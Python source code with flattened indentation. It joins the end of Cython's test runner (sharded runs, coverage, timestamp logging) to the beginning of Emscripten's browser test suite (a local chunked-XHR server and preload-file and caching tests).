os.environ["PYTHONIOENCODING"] = sys.stdout.encoding or sys.getdefaultencoding()
import multiprocessing
pool = multiprocessing.Pool(options.shard_count)
tasks = [(options, cmd_args, shard_num) for shard_num in range(options.shard_count)]
error_shards = []
failure_outputs = []
# NOTE: create process pool before time stamper thread to avoid forking issues.
total_time = time.time()
stats = Stats()
with time_stamper_thread(interval=keep_alive_interval):
for shard_num, shard_stats, return_code, failure_output in pool.imap_unordered(runtests_callback, tasks):
if return_code != 0:
error_shards.append(shard_num)
failure_outputs.append(failure_output)
sys.stderr.write("FAILED (%s/%s)\n" % (shard_num, options.shard_count))
sys.stderr.write("ALL DONE (%s/%s)\n" % (shard_num, options.shard_count))
stats.update(shard_stats)
pool.close()
pool.join()
total_time = time.time() - total_time
sys.stderr.write("Sharded tests run in %d seconds (%.1f minutes)\n" % (round(total_time), total_time / 60.))
if error_shards:
sys.stderr.write("Errors found in shards %s\n" % ", ".join([str(e) for e in error_shards]))
for failure_output in zip(error_shards, failure_outputs):
sys.stderr.write("\nErrors from shard %s:\n%s" % failure_output)
return_code = 1
else:
return_code = 0
else:
with time_stamper_thread(interval=keep_alive_interval):
_, stats, return_code, _ = runtests(options, cmd_args, coverage)
if coverage:
if options.shard_count > 1 and options.shard_num == -1:
coverage.combine()
coverage.stop()
stats.print_stats(sys.stderr)
if coverage:
save_coverage(coverage, options)
sys.stderr.write("ALL DONE\n")
sys.stderr.flush()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(return_code)
else:
sys.exit(return_code)
@contextmanager
def time_stamper_thread(interval=10):
"""
Print regular time stamps into the build logs to find slow tests.
@param interval: time interval in seconds
"""
if not interval or interval < 0:
# Do nothing
yield
return
try:
_xrange = xrange
except NameError:
_xrange = range
import threading
import datetime
from time import sleep
interval = _xrange(interval * 4)
now = datetime.datetime.now
stop = False
# We capture stderr in some places.
# => make sure we write to the real (original) stderr of the test runner.
stderr = os.dup(2)
def write(s):
os.write(stderr, s if type(s) is bytes else s.encode('ascii'))
def time_stamper():
while True:
for _ in interval:
if stop:
return
sleep(1./4)
write('\n#### %s\n' % now())
thread = threading.Thread(target=time_stamper, name='time_stamper')
thread.setDaemon(True) # Py2 ...
thread.start()
try:
yield
finally:
stop = True
thread.join()
os.close(stderr)
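# Typical use of time_stamper_thread is shown in main() above: wrapping the test
# run in `with time_stamper_thread(interval=10):` writes a timestamp line to the
# original stderr roughly every 10 seconds, so slow tests stand out in CI logs
# even while sys.stderr itself is being captured.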
def configure_cython(options):
global CompilationOptions, pyrex_default_options, cython_compile
from Cython.Compiler.Options import \
CompilationOptions, \
default_options as pyrex_default_options
from Cython.Compiler.Options import _directive_defaults as directive_defaults
from Cython.Compiler import Errors
Errors.LEVEL = 0 # show all warnings
from Cython.Compiler import Options
Options.generate_cleanup_code = 3 # complete cleanup code
from Cython.Compiler import DebugFlags
DebugFlags.debug_temp_code_comments = 1
pyrex_default_options['formal_grammar'] = options.use_formal_grammar
if options.profile:
directive_defaults['profile'] = True
if options.watermark:
import Cython.Compiler.Version
Cython.Compiler.Version.watermark = options.watermark
def save_coverage(coverage, options):
if options.coverage:
coverage.report(show_missing=0)
if options.coverage_xml:
coverage.xml_report(outfile="coverage-report.xml")
if options.coverage_html:
coverage.html_report(directory="coverage-report-html")
def runtests_callback(args):
options, cmd_args, shard_num = args
options.shard_num = shard_num
return runtests(options, cmd_args)
def runtests(options, cmd_args, coverage=None):
# faulthandler should be able to provide a limited traceback
# in the event of a segmentation fault. Hopefully better than Travis
# just running on until the timeout. Only available on Python 3.3+.
try:
import faulthandler
except ImportError:
pass # OK - not essential
else:
faulthandler.enable()
if sys.platform == "win32" and sys.version_info < (3, 6):
# enable Unicode console output, if possible
try:
import win_unicode_console
except ImportError:
pass
else:
win_unicode_console.enable()
WITH_CYTHON = options.with_cython
ROOTDIR = os.path.abspath(options.root_dir)
WORKDIR = os.path.abspath(options.work_dir)
if WITH_CYTHON:
configure_cython(options)
xml_output_dir = options.xml_output_dir
if options.shard_num > -1:
WORKDIR = os.path.join(WORKDIR, str(options.shard_num))
if xml_output_dir:
xml_output_dir = os.path.join(xml_output_dir, 'shard-%03d' % options.shard_num)
# RUN ALL TESTS!
UNITTEST_MODULE = "Cython"
UNITTEST_ROOT = os.path.join(os.path.dirname(__file__), UNITTEST_MODULE)
if WITH_CYTHON:
if os.path.exists(WORKDIR):
for path in os.listdir(WORKDIR):
if path in ("support", "Cy3"): continue
shutil.rmtree(os.path.join(WORKDIR, path), ignore_errors=True)
if not os.path.exists(WORKDIR):
os.makedirs(WORKDIR)
if options.shard_num <= 0:
sys.stderr.write("Python %s\n" % sys.version)
sys.stderr.write("\n")
if WITH_CYTHON:
sys.stderr.write("Running tests against Cython %s\n" % get_version())
else:
sys.stderr.write("Running tests without Cython.\n")
if options.for_debugging:
options.cleanup_workdir = False
options.cleanup_sharedlibs = False
options.fork = False
if WITH_CYTHON and include_debugger:
from Cython.Compiler.Options import default_options as compiler_default_options
compiler_default_options['gdb_debug'] = True
compiler_default_options['output_dir'] = os.getcwd()
if IS_PYPY:
if options.with_refnanny:
sys.stderr.write("Disabling refnanny in PyPy\n")
options.with_refnanny = False
if options.with_refnanny:
from pyximport.pyxbuild import pyx_to_dll
libpath = pyx_to_dll(os.path.join("Cython", "Runtime", "refnanny.pyx"),
build_in_temp=True,
pyxbuild_dir=os.path.join(WORKDIR, "support"))
sys.path.insert(0, os.path.split(libpath)[0])
CDEFS.append(('CYTHON_REFNANNY', '1'))
if options.limited_api:
CFLAGS.append("-DCYTHON_LIMITED_API=1")
CFLAGS.append('-Wno-unused-function')
if xml_output_dir and options.fork:
# XML test output and forked testing don't currently work together
sys.stderr.write("Disabling forked testing to support XML test output\n")
options.fork = False
if WITH_CYTHON:
sys.stderr.write("Using Cython language level %d.\n" % options.language_level)
test_bugs = False
if options.tickets:
for ticket_number in options.tickets:
test_bugs = True
cmd_args.append('ticket:%s' % ticket_number)
if not test_bugs:
for selector in cmd_args:
if selector.startswith('bugs'):
test_bugs = True
selectors = [ string_selector(r) for r in cmd_args ]
verbose_excludes = selectors or options.verbosity >= 2
if not selectors:
selectors = [ lambda x, tags=None: True ]
# Check which external modules are not present and exclude tests
# which depend on them (by prefix)
missing_dep_excluder = MissingDependencyExcluder(EXT_DEP_MODULES)
version_dep_excluder = VersionDependencyExcluder(VER_DEP_MODULES)
exclude_selectors = [missing_dep_excluder, version_dep_excluder] # want to print msg at exit
try:
import IPython.core.release
if list(IPython.core.release._ver) < [1, 0, 0]:
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('IPython'))
try:
raise ImportError("Jedi typer is currently broken, see GH#1845")
import jedi
if not ([0, 9] <= list(map(int, re.findall('[0-9]+', jedi.__version__ or '0')))):
raise ImportError
except (ImportError, AttributeError, TypeError):
exclude_selectors.append(RegExSelector('Jedi'))
if options.exclude:
exclude_selectors += [ string_selector(r) for r in options.exclude ]
if not COMPILER_HAS_INT128 or not IS_CPYTHON:
exclude_selectors += [RegExSelector('int128')]
if options.shard_num > -1:
exclude_selectors.append(ShardExcludeSelector(options.shard_num, options.shard_count))
if not test_bugs:
bug_files = [
('bugs.txt', True),
('pypy_bugs.txt', IS_PYPY),
('pypy2_bugs.txt', IS_PYPY and IS_PY2),
('pypy_crash_bugs.txt', IS_PYPY),
('pypy_implementation_detail_bugs.txt', IS_PYPY),
('limited_api_bugs.txt', options.limited_api),
('windows_bugs.txt', sys.platform == 'win32'),
('cygwin_bugs.txt', sys.platform == 'cygwin')
]
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
for bugs_file_name, condition in bug_files if condition
]
global COMPILER
if options.compiler:
COMPILER = options.compiler
selected_backends = [ name.strip() for name in options.backends.split(',') if name.strip() ]
backends = []
for backend in selected_backends:
if backend == 'c' and not options.use_c:
continue
elif backend == 'cpp' and not options.use_cpp:
continue
elif backend not in BACKENDS:
sys.stderr.write("Unknown backend requested: '%s' not one of [%s]\n" % (
backend, ','.join(BACKENDS)))
sys.exit(1)
backends.append(backend)
if options.shard_num <= 0:
sys.stderr.write("Backends: %s\n" % ','.join(backends))
languages = backends
if 'TRAVIS' in os.environ and sys.platform == 'darwin' and 'cpp' in languages:
bugs_file_name = 'travis_macos_cpp_bugs.txt'
exclude_selectors += [
FileListExcluder(os.path.join(ROOTDIR, bugs_file_name),
verbose=verbose_excludes)
]
if options.use_common_utility_dir:
common_utility_dir = os.path.join(WORKDIR, 'utility_code')
if not os.path.exists(common_utility_dir):
os.makedirs(common_utility_dir)
else:
common_utility_dir = None
sys.stderr.write("\n")
test_suite = unittest.TestSuite()
stats = Stats()
if options.unittests:
collect_unittests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.doctests:
collect_doctests(UNITTEST_ROOT, UNITTEST_MODULE + ".", test_suite, selectors, exclude_selectors)
if options.filetests and languages:
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir, add_embedded_test=True, stats=stats)
test_suite.addTest(filetests.build_suite())
if options.examples and languages:
examples_workdir = os.path.join(WORKDIR, 'examples')
for subdirectory in glob.glob(os.path.join(options.examples_dir, "*/")):
filetests = TestBuilder(subdirectory, examples_workdir, selectors, exclude_selectors,
options, options.pyregr, languages, test_bugs,
options.language_level, common_utility_dir,
options.pythran_dir,
default_mode='compile', stats=stats)
test_suite.addTest(filetests.build_suite())
if options.system_pyregr and languages:
sys_pyregr_dir = os.path.join(sys.prefix, 'lib', 'python'+sys.version[:3], 'test')
if not os.path.isdir(sys_pyregr_dir):
sys_pyregr_dir = os.path.join(os.path.dirname(sys.executable), 'Lib', 'test') # source build
if os.path.isdir(sys_pyregr_dir):
filetests = TestBuilder(ROOTDIR, WORKDIR, selectors, exclude_selectors,
options, True, languages, test_bugs,
sys.version_info[0], common_utility_dir, stats=stats)
sys.stderr.write("Including CPython regression tests in %s\n" % sys_pyregr_dir)
test_suite.addTest(filetests.handle_directory(sys_pyregr_dir, 'pyregr'))
if options.code_style and options.shard_num <= 0:
try:
import pycodestyle
except ImportError:
# Hack to make the exclusion visible.
missing_dep_excluder.tests_missing_deps.append('TestCodeFormat')
else:
test_suite.addTest(TestCodeFormat(options.cython_dir))
if xml_output_dir:
from Cython.Tests.xmlrunner import XMLTestRunner
if not os.path.exists(xml_output_dir):
try:
os.makedirs(xml_output_dir)
except OSError:
pass # concurrency issue?
test_runner = XMLTestRunner(output=xml_output_dir,
verbose=options.verbosity > 0)
if options.failfast:
sys.stderr.write("--failfast not supported with XML runner\n")
else:
text_runner_options = {}
if options.failfast:
text_runner_options['failfast'] = True
test_runner = unittest.TextTestRunner(verbosity=options.verbosity, **text_runner_options)
if options.pyximport_py:
from pyximport import pyximport
pyximport.install(pyimport=True, build_dir=os.path.join(WORKDIR, '_pyximport'),
load_py_module_on_import_failure=True, inplace=True)
try:
gc.set_debug(gc.DEBUG_UNCOLLECTABLE)
except AttributeError:
pass # not available on PyPy
result = test_runner.run(test_suite)
if common_utility_dir and options.shard_num < 0 and options.cleanup_workdir:
shutil.rmtree(common_utility_dir)
if missing_dep_excluder.tests_missing_deps:
sys.stderr.write("Following tests excluded because of missing dependencies on your system:\n")
for test in missing_dep_excluder.tests_missing_deps:
sys.stderr.write(" %s\n" % test)
if options.with_refnanny:
import refnanny
sys.stderr.write("\n".join([repr(x) for x in refnanny.reflog]))
result_code = 0 if options.exit_ok else not result.wasSuccessful()
if xml_output_dir:
failure_output = ""
else:
failure_output = "".join(collect_failure_output(result))
return options.shard_num, stats, result_code, failure_output
def collect_failure_output(result):
"""Extract test error/failure output from a TextTestResult."""
failure_output = []
for flavour, errors in (("ERROR", result.errors), ("FAIL", result.failures)):
for test, err in errors:
failure_output.append("%s\n%s: %s\n%s\n%s\n" % (
result.separator1,
flavour, result.getDescription(test),
result.separator2,
err))
return failure_output
if __name__ == '__main__':
try:
main()
except Exception:
traceback.print_exc()
try:
check_thread_termination(ignore_seen=False)
except PendingThreadsError:
# normal program exit won't kill the threads, do it the hard way here
flush_and_terminate(1)
sys.exit(1)
|
test_browser.py
|
# coding=utf-8
# Copyright 2013 The Emscripten Authors. All rights reserved.
# Emscripten is available under two separate licenses, the MIT license and the
# University of Illinois/NCSA Open Source License. Both these licenses can be
# found in the LICENSE file.
import argparse
import json
import multiprocessing
import os
import random
import shlex
import shutil
import subprocess
import time
import unittest
import webbrowser
import zlib
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import urlopen
from runner import BrowserCore, RunnerCore, path_from_root, has_browser, EMTEST_BROWSER, Reporting
from runner import create_file, parameterized, ensure_dir, disabled, test_file, WEBIDL_BINDER
from tools import building
from tools import shared
from tools import system_libs
from tools.shared import EMCC, WINDOWS, FILE_PACKAGER, PIPE
from tools.shared import try_delete, config
def test_chunked_synchronous_xhr_server(support_byte_ranges, chunkSize, data, checksum, port):
class ChunkedServerHandler(BaseHTTPRequestHandler):
def sendheaders(s, extra=[], length=len(data)):
s.send_response(200)
s.send_header("Content-Length", str(length))
s.send_header("Access-Control-Allow-Origin", "http://localhost:%s" % port)
s.send_header('Cross-Origin-Resource-Policy', 'cross-origin')
s.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
s.send_header("Access-Control-Expose-Headers", "Content-Length, Accept-Ranges")
s.send_header("Content-type", "application/octet-stream")
if support_byte_ranges:
s.send_header("Accept-Ranges", "bytes")
for i in extra:
s.send_header(i[0], i[1])
s.end_headers()
def do_HEAD(s):
s.sendheaders()
def do_OPTIONS(s):
s.sendheaders([("Access-Control-Allow-Headers", "Range")], 0)
def do_GET(s):
if s.path == '/':
s.sendheaders()
elif not support_byte_ranges:
s.sendheaders()
s.wfile.write(data)
else:
start, end = s.headers.get("range").split("=")[1].split("-")
start = int(start)
end = int(end)
end = min(len(data) - 1, end)
length = end - start + 1
s.sendheaders([], length)
s.wfile.write(data[start:end + 1])
# CORS preflight makes OPTIONS requests which we need to account for.
expectedConns = 22
httpd = HTTPServer(('localhost', 11111), ChunkedServerHandler)
for i in range(expectedConns + 1):
httpd.handle_request()
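# A minimal sketch (not part of the original suite) of how the helper above
# could be driven manually for local debugging; the data size and chunk size are
# illustrative, and the browser side is assumed to connect to localhost:11111
# exactly as ChunkedServerHandler does.
def _demo_run_chunked_server():
    data = b'0123456789' * 1024
    proc = multiprocessing.Process(
        target=test_chunked_synchronous_xhr_server,
        args=(True, 16, data, zlib.adler32(data), 11111))
    proc.start()  # serves the fixed number of requests, then the child exits
    return proc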
def shell_with_script(shell_file, output_file, replacement):
with open(path_from_root('src', shell_file)) as input:
with open(output_file, 'w') as output:
output.write(input.read().replace('{{{ SCRIPT }}}', replacement))
def is_chrome():
return EMTEST_BROWSER and 'chrom' in EMTEST_BROWSER.lower()
def no_chrome(note='chrome is not supported'):
if is_chrome():
return unittest.skip(note)
return lambda f: f
def is_firefox():
return EMTEST_BROWSER and 'firefox' in EMTEST_BROWSER.lower()
def no_firefox(note='firefox is not supported'):
if is_firefox():
return unittest.skip(note)
return lambda f: f
def no_swiftshader(f):
assert callable(f)
def decorated(self):
if is_chrome() and '--use-gl=swiftshader' in EMTEST_BROWSER:
self.skipTest('not compatible with swiftshader')
return f(self)
return decorated
def requires_threads(f):
assert callable(f)
def decorated(self, *args, **kwargs):
if os.environ.get('EMTEST_LACKS_THREAD_SUPPORT'):
self.skipTest('EMTEST_LACKS_THREAD_SUPPORT is set')
return f(self, *args, **kwargs)
return decorated
def requires_asmfs(f):
assert callable(f)
def decorated(self, *args, **kwargs):
# https://github.com/emscripten-core/emscripten/issues/9534
self.skipTest('ASMFS is looking for a maintainer')
return f(self, *args, **kwargs)
return decorated
# Today we only support the wasm backend, so any test that is disabled under the llvm
# backend is always disabled.
# TODO(sbc): Investigate all tests with this decorator and either fix or remove the test.
def no_wasm_backend(note=''):
assert not callable(note)
return unittest.skip(note)
requires_graphics_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_GRAPHICS_HARDWARE'), "This test requires graphics hardware")
requires_sound_hardware = unittest.skipIf(os.getenv('EMTEST_LACKS_SOUND_HARDWARE'), "This test requires sound hardware")
requires_sync_compilation = unittest.skipIf(is_chrome(), "This test requires synchronous compilation, which does not work in Chrome (except for tiny wasms)")
requires_offscreen_canvas = unittest.skipIf(os.getenv('EMTEST_LACKS_OFFSCREEN_CANVAS'), "This test requires a browser with OffscreenCanvas")
class browser(BrowserCore):
@classmethod
def setUpClass(cls):
super(browser, cls).setUpClass()
cls.browser_timeout = 60
print()
print('Running the browser tests. Make sure the browser allows popups from localhost.')
print()
def setUp(self):
super(BrowserCore, self).setUp()
# avoid various compiler warnings that many browser tests currently generate
self.emcc_args += [
'-Wno-pointer-sign',
'-Wno-int-conversion',
]
def test_sdl1_in_emscripten_nonstrict_mode(self):
if 'EMCC_STRICT' in os.environ and int(os.environ['EMCC_STRICT']):
self.skipTest('This test requires being run in non-strict mode (EMCC_STRICT env. variable unset)')
# TODO: This test is verifying behavior that will be deprecated at some point in the future; remove this test once
# system JS libraries are no longer automatically linked.
self.btest('hello_world_sdl.cpp', reference='htmltest.png')
def test_sdl1(self):
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-lSDL', '-lGL'])
self.btest('hello_world_sdl.cpp', reference='htmltest.png', args=['-s', 'USE_SDL', '-lGL']) # is the default anyhow
# Deliberately named as test_zzz_* to make this test the last one
# as this test may take the focus away from the main test window
# by opening a new window and possibly not closing it.
def test_zzz_html_source_map(self):
if not has_browser():
self.skipTest('need a browser')
cpp_file = 'src.cpp'
html_file = 'src.html'
# browsers will try to 'guess' the corresponding original line if a
# generated line is unmapped, so if we want to make sure that our
# numbering is correct, we need to provide a couple of 'possible wrong
# answers'. thus, we add some printf calls so that the cpp file gets
# multiple mapped lines. in other words, if the program consists of a
# single 'throw' statement, browsers may just map any thrown exception to
# that line, because it will be the only mapped line.
with open(cpp_file, 'w') as f:
f.write(r'''
#include <cstdio>
int main() {
printf("Starting test\n");
try {
throw 42; // line 8
} catch (int e) { }
printf("done\n");
return 0;
}
''')
# use relative paths when calling emcc, because file:// URIs can only load
# sourceContent when the maps are relative paths
try_delete(html_file)
try_delete(html_file + '.map')
self.compile_btest(['src.cpp', '-o', 'src.html', '-gsource-map'])
self.assertExists(html_file)
self.assertExists('src.wasm.map')
webbrowser.open_new('file://' + html_file)
print('''
If manually bisecting:
Check that you see src.cpp among the page sources.
Even better, add a breakpoint, e.g. on the printf, then reload, then step
through and see the print (best to run with EMTEST_SAVE_DIR=1 for the reload).
''')
def test_emscripten_log(self):
self.btest_exit(test_file('emscripten_log', 'emscripten_log.cpp'),
args=['--pre-js', path_from_root('src', 'emscripten-source-map.min.js'), '-gsource-map'])
def test_preload_file(self):
absolute_src_path = os.path.join(self.get_dir(), 'somefile.txt').replace('\\', '/')
open(absolute_src_path, 'w').write('''load me right before running the code please''')
absolute_src_path2 = os.path.join(self.get_dir(), '.somefile.txt').replace('\\', '/')
open(absolute_src_path2, 'w').write('''load me right before running the code please''')
absolute_src_path3 = os.path.join(self.get_dir(), 'some@file.txt').replace('\\', '/')
open(absolute_src_path3, 'w').write('''load me right before running the code please''')
def make_main(path):
print('make main at', path)
path = path.replace('\\', '\\\\').replace('"', '\\"') # Escape tricky path name for use inside a C string.
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
REPORT_RESULT(result);
return 0;
}
''' % path)
test_cases = [
# (source preload-file string, file on target FS to load)
("somefile.txt", "somefile.txt"),
(".somefile.txt@somefile.txt", "somefile.txt"),
("./somefile.txt", "somefile.txt"),
("somefile.txt@file.txt", "file.txt"),
("./somefile.txt@file.txt", "file.txt"),
("./somefile.txt@./file.txt", "file.txt"),
("somefile.txt@/file.txt", "file.txt"),
("somefile.txt@/", "somefile.txt"),
(absolute_src_path + "@file.txt", "file.txt"),
(absolute_src_path + "@/file.txt", "file.txt"),
(absolute_src_path + "@/", "somefile.txt"),
("somefile.txt@/directory/file.txt", "/directory/file.txt"),
("somefile.txt@/directory/file.txt", "directory/file.txt"),
(absolute_src_path + "@/directory/file.txt", "directory/file.txt"),
("some@@file.txt@other.txt", "other.txt"),
("some@@file.txt@some@@otherfile.txt", "some@otherfile.txt")]
for srcpath, dstpath in test_cases:
print('Testing', srcpath, dstpath)
make_main(dstpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
if WINDOWS:
# On Windows, the following non-alphanumeric non-control code ASCII characters are supported.
# The characters <, >, ", |, ?, * are not allowed, because the Windows filesystem doesn't support those.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~.txt'
else:
# All 7-bit non-alphanumeric non-control code ASCII characters except /, : and \ are allowed.
tricky_filename = '!#$%&\'()+,-. ;=@[]^_`{}~ "*<>?|.txt'
open(os.path.join(self.get_dir(), tricky_filename), 'w').write('''load me right before running the code please''')
make_main(tricky_filename)
# As an Emscripten-specific feature, the character '@' must be escaped in the form '@@' to not confuse with the 'src@dst' notation.
self.compile_btest(['main.cpp', '--preload-file', tricky_filename.replace('@', '@@'), '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# By absolute path
make_main('somefile.txt') # absolute becomes relative
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Test subdirectory handling with asset packaging.
try_delete('assets')
ensure_dir('assets/sub/asset1/'.replace('\\', '/'))
ensure_dir('assets/sub/asset1/.git'.replace('\\', '/')) # Test adding directory that shouldn't exist.
ensure_dir('assets/sub/asset2/'.replace('\\', '/'))
create_file('assets/sub/asset1/file1.txt', '''load me right before running the code please''')
create_file('assets/sub/asset1/.git/shouldnt_be_embedded.txt', '''this file should not get embedded''')
create_file('assets/sub/asset2/file2.txt', '''load me right before running the code please''')
absolute_assets_src_path = 'assets'.replace('\\', '/')
def make_main_two_files(path1, path2, nonexistingpath):
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("load me right before", buf);
f = fopen("%s", "r");
if (f == NULL)
result = 0;
fclose(f);
f = fopen("%s", "r");
if (f != NULL)
result = 0;
REPORT_RESULT(result);
return 0;
}
''' % (path1, path2, nonexistingpath))
test_cases = [
# (source directory to embed, file1 on target FS to load, file2 on target FS to load, name of a file that *shouldn't* exist on VFS)
("assets", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/", "assets/sub/asset1/file1.txt", "assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets/@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
("assets@./", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/", "/sub/asset1/file1.txt", "/sub/asset2/file2.txt", "/sub/asset1/.git/shouldnt_be_embedded.txt"),
(absolute_assets_src_path + "@/assets", "/assets/sub/asset1/file1.txt", "/assets/sub/asset2/file2.txt", "assets/sub/asset1/.git/shouldnt_be_embedded.txt")]
for test in test_cases:
(srcpath, dstpath1, dstpath2, nonexistingpath) = test
make_main_two_files(dstpath1, dstpath2, nonexistingpath)
print(srcpath)
self.compile_btest(['main.cpp', '--preload-file', srcpath, '--exclude-file', '*/.*', '-o', 'page.html'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Should still work with -o subdir/..
make_main('somefile.txt') # absolute becomes relative
ensure_dir('dirrey')
self.compile_btest(['main.cpp', '--preload-file', absolute_src_path, '-o', 'dirrey/page.html'])
self.run_browser('dirrey/page.html', 'You should see |load me right before|.', '/report_result?1')
# With FS.preloadFile
create_file('pre.js', '''
Module.preRun = function() {
FS.createPreloadedFile('/', 'someotherfile.txt', 'somefile.txt', true, false); // we need --use-preload-plugins for this.
};
''')
make_main('someotherfile.txt')
self.compile_btest(['main.cpp', '--pre-js', 'pre.js', '-o', 'page.html', '--use-preload-plugins'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
# Tests that user .html shell files can manually download .data files created with --preload-file cmdline.
def test_preload_file_with_manual_data_download(self):
src = test_file('manual_download_data.cpp')
create_file('file.txt', '''Hello!''')
self.compile_btest([src, '-o', 'manual_download_data.js', '--preload-file', 'file.txt@/file.txt'])
shutil.copyfile(test_file('manual_download_data.html'), 'manual_download_data.html')
self.run_browser('manual_download_data.html', 'Hello!', '/report_result?1')
# Tests that if the output files have single or double quotes in them, that it will be handled by correctly escaping the names.
def test_output_file_escaping(self):
tricky_part = '\'' if WINDOWS else '\' and \"' # On Windows, files/directories may not contain a double quote character. On non-Windowses they can, so test that.
d = 'dir with ' + tricky_part
abs_d = os.path.join(self.get_dir(), d)
ensure_dir(abs_d)
txt = 'file with ' + tricky_part + '.txt'
abs_txt = os.path.join(abs_d, txt)
open(abs_txt, 'w').write('load me right before')
cpp = os.path.join(d, 'file with ' + tricky_part + '.cpp')
open(cpp, 'w').write(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
int main() {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = !strcmp("|load me right before|", buf);
REPORT_RESULT(result);
return 0;
}
''' % (txt.replace('\'', '\\\'').replace('\"', '\\"')))
data_file = os.path.join(abs_d, 'file with ' + tricky_part + '.data')
data_js_file = os.path.join(abs_d, 'file with ' + tricky_part + '.js')
self.run_process([FILE_PACKAGER, data_file, '--use-preload-cache', '--indexedDB-name=testdb', '--preload', abs_txt + '@' + txt, '--js-output=' + data_js_file])
page_file = os.path.join(d, 'file with ' + tricky_part + '.html')
abs_page_file = os.path.join(self.get_dir(), page_file)
self.compile_btest([cpp, '--pre-js', data_js_file, '-o', abs_page_file, '-s', 'FORCE_FILESYSTEM'])
self.run_browser(page_file, '|load me right before|.', '/report_result?0')
def test_preload_caching(self):
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % 'somefile.txt')
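# JS library whose checkPreloadResults() counts how many preloaded packages were loaded from the IndexedDB cache.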
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
# test caching of various sizes, including sizes higher than 128MB which is
# chrome's limit on IndexedDB item sizes, see
# https://cs.chromium.org/chromium/src/content/renderer/indexed_db/webidbdatabase_impl.cc?type=cs&q=%22The+serialized+value+is+too+large%22&sq=package:chromium&g=0&l=177
# https://cs.chromium.org/chromium/src/out/Debug/gen/third_party/blink/public/mojom/indexeddb/indexeddb.mojom.h?type=cs&sq=package:chromium&g=0&l=60
for extra_size in (0, 1 * 1024 * 1024, 100 * 1024 * 1024, 150 * 1024 * 1024):
if is_chrome() and extra_size >= 100 * 1024 * 1024:
continue
create_file('somefile.txt', '''load me right before running the code please''' + ('_' * extra_size))
print('size:', os.path.getsize('somefile.txt'))
self.compile_btest(['main.cpp', '--use-preload-cache', '--js-library', 'test.js', '--preload-file', 'somefile.txt', '-o', 'page.html', '-s', 'ALLOW_MEMORY_GROWTH'])
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?1')
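# On the second load the package should come from the preload cache, so checkPreloadResults() adds 1 to the result.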
self.run_browser('page.html', 'You should see |load me right before|.', '/report_result?2')
def test_preload_caching_indexeddb_name(self):
create_file('somefile.txt', '''load me right before running the code please''')
def make_main(path):
print(path)
create_file('main.cpp', r'''
#include <stdio.h>
#include <string.h>
#include <emscripten.h>
extern "C" {
extern int checkPreloadResults();
}
int main(int argc, char** argv) {
FILE *f = fopen("%s", "r");
char buf[100];
fread(buf, 1, 20, f);
buf[20] = 0;
fclose(f);
printf("|%%s|\n", buf);
int result = 0;
result += !strcmp("load me right before", buf);
result += checkPreloadResults();
REPORT_RESULT(result);
return 0;
}
''' % path)
create_file('test.js', '''
mergeInto(LibraryManager.library, {
checkPreloadResults: function() {
var cached = 0;
var packages = Object.keys(Module['preloadResults']);
packages.forEach(function(package) {
var fromCache = Module['preloadResults'][package]['fromCache'];
if (fromCache)
++ cached;
});
return cached;
}
});
''')
make_main('somefile.txt')
self.run_process([FILE_PACKAGER, 'somefile.data', '--use-preload-cache', '--indexedDB-name=testdb', '--preload', 'somefile.txt', '--js-output=' + 'somefile.js'])
